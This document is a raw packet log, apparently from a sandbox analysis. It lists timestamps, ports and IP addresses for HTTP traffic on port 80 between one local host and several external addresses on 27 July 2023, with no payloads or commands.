Jul 27, 2023 20:19:27.972063065 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.972074986 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.972107887 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.972131014 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.972429991 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.972455978 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.972482920 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.972517014 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.972517967 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.972543001 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.972563028 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.972919941 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.972946882 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.972973108 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.972997904 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.973016977 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.973058939 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.973447084 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.973474979 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.973503113 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.973537922 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.973548889 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.973563910 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.973572016 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.973618984 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.973937988 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.973964930 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.973989010 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.974014997 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.974036932 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.974061966 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.974422932 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.974452019 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.974498987 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.974518061 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.974524975 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.974550009 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.974581003 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.974976063 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.975003958 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.975025892 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:27.975076914 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.975116014 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:27.977999926 CEST	49792	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:27.979834080 CEST	49795	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:28.009670973 CEST	80	49792	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:28.009752035 CEST	49792	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:28.011487007 CEST	80	49795	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:28.011611938 CEST	49795	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:28.013664007 CEST	49795	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:28.036565065 CEST	80	49766	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:28.037605047 CEST	49766	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:28.045435905 CEST	80	49795	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:28.045650959 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.045679092 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.045703888 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.045728922 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.045752048 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.045805931 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.046083927 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.046111107 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.046138048 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.046161890 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.046209097 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.046355009 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.046588898 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.046617985 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.046642065 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.046665907 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.046690941 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.046703100 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.046761990 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.047115088 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.047142029 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.047166109 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.047190905 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.047210932 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.047216892 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.047236919 CEST	80	49795	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:28.047252893 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.047307968 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.047343016 CEST	49795	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:28.047585011 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.047612906 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.047637939 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.047662020 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.047703981 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.047739983 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.048096895 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.139770031 CEST	80	49794	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:28.139966965 CEST	49794	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:28.140222073 CEST	49794	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:28.141942024 CEST	80	49793	151.251.31.98	192.168.2.4
Jul 27, 2023 20:19:28.141979933 CEST	80	49793	151.251.31.98	192.168.2.4
Jul 27, 2023 20:19:28.142075062 CEST	49793	80	192.168.2.4	151.251.31.98
Jul 27, 2023 20:19:28.142170906 CEST	49793	80	192.168.2.4	151.251.31.98
Jul 27, 2023 20:19:28.170469046 CEST	49795	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:28.171192884 CEST	49796	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:28.195333004 CEST	80	49793	151.251.31.98	192.168.2.4
Jul 27, 2023 20:19:28.202508926 CEST	80	49795	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:28.202594995 CEST	49795	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:28.202783108 CEST	80	49796	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:28.202903032 CEST	49796	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:28.204319000 CEST	49796	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:28.226880074 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.226927996 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.226984024 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.227174044 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.227199078 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.227252960 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.235992908 CEST	80	49796	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:28.237149954 CEST	80	49796	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:28.237561941 CEST	49796	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:28.265456915 CEST	49797	80	192.168.2.4	200.114.247.163
Jul 27, 2023 20:19:28.310828924 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.310898066 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.310992002 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.311017036 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.311053038 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.311094999 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.311197042 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.311223030 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.311248064 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.311260939 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.311270952 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.311316967 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.311729908 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.311768055 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.311796904 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.311821938 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.311839104 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.311849117 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.311873913 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.311919928 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.312115908 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.312216043 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.312242985 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.312283993 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.312302113 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.312391996 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.312676907 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.312712908 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.312738895 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.312763929 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.312788963 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.312798977 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.312838078 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.313240051 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.313273907 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.313299894 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.313321114 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.313396931 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.316775084 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.317200899 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.317228079 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.317257881 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.317284107 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.317286968 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.317329884 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.317349911 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.317715883 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.317800045 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.317826986 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.317852974 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.317877054 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.317919016 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.317941904 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.318207026 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.318239927 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.318264008 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.318289042 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.318312883 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.318377972 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.318690062 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.318742990 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.318789005 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.318810940 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.318835020 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.318859100 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.318928957 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.319190979 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.319216967 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.319242001 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.319267035 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.319293022 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.319307089 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.319343090 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.319777012 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.319801092 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.319818974 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.319869995 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.319904089 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.350966930 CEST	49796	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:28.356956959 CEST	49798	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:28.383116961 CEST	80	49796	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:28.383254051 CEST	49796	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:28.388565063 CEST	80	49798	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:28.388720989 CEST	49798	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:28.389189005 CEST	49798	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:28.414081097 CEST	80	49794	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:28.420538902 CEST	80	49798	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:28.422547102 CEST	80	49798	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:28.422658920 CEST	49798	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:28.422832966 CEST	80	49794	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:28.484137058 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.527590990 CEST	80	49797	200.114.247.163	192.168.2.4
Jul 27, 2023 20:19:28.529643059 CEST	49797	80	192.168.2.4	200.114.247.163
Jul 27, 2023 20:19:28.530359030 CEST	49797	80	192.168.2.4	200.114.247.163
Jul 27, 2023 20:19:28.530416965 CEST	49797	80	192.168.2.4	200.114.247.163
Jul 27, 2023 20:19:28.531527042 CEST	49798	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:28.532324076 CEST	49799	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:28.563385963 CEST	80	49798	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:28.563497066 CEST	49798	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:28.564460039 CEST	80	49799	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:28.564651966 CEST	49799	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:28.565018892 CEST	49799	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:28.581162930 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.581216097 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.581271887 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.581701994 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.581763029 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.581784010 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.581830978 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.581886053 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.581897020 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.582178116 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.582247019 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.582271099 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.582294941 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.582341909 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.582389116 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.582391977 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.582679987 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.582727909 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.582767010 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.582776070 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.582819939 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.582828045 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.582881927 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.582916021 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.583156109 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.583204985 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.583250999 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.583298922 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.583340883 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.583342075 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.583636045 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.583681107 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.583726883 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.583761930 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.583774090 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.583818913 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.583879948 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.583923101 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.584124088 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.587704897 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.587809086 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.588202953 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.588249922 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.588335991 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.588336945 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.588392019 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.588438988 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.588474989 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.588710070 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.588757038 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.588778019 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.588802099 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.588850021 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.589184046 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.589231968 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.589271069 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.589277029 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.589315891 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.589324951 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.589374065 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.589385033 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.589612007 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.589747906 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.589796066 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.589842081 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.589864016 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.589888096 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.589951992 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.590195894 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.590241909 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.590290070 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.590313911 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.590333939 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.590379953 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.590392113 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.590720892 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.590768099 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.590805054 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.590840101 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.590877056 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.597110033 CEST	80	49799	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:28.598712921 CEST	80	49799	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:28.599666119 CEST	49799	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:28.620002985 CEST	49794	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:28.725529909 CEST	49799	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:28.726428032 CEST	49800	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:28.758014917 CEST	80	49799	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:28.758136988 CEST	80	49800	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:28.758138895 CEST	49799	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:28.760082960 CEST	49800	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:28.760411978 CEST	49800	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:28.791914940 CEST	80	49797	200.114.247.163	192.168.2.4
Jul 27, 2023 20:19:28.792006969 CEST	80	49800	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:28.793699980 CEST	80	49800	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:28.795533895 CEST	49800	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:28.818680048 CEST	49794	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:28.818753958 CEST	49794	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:28.837982893 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.852124929 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.852158070 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.852178097 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.852338076 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.852338076 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.852524996 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.852550983 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.852576017 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.852622986 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.852627993 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.852653027 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.852694988 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.852962971 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.852989912 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.853014946 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.853044987 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.853085041 CEST	49778	80	192.168.2.4	183.100.39.157
Jul 27, 2023 20:19:28.853570938 CEST	80	49778	183.100.39.157	192.168.2.4
Jul 27, 2023 20:19:28.853614092 CEST	80	49778	183.100.39.157	192.168.2.4
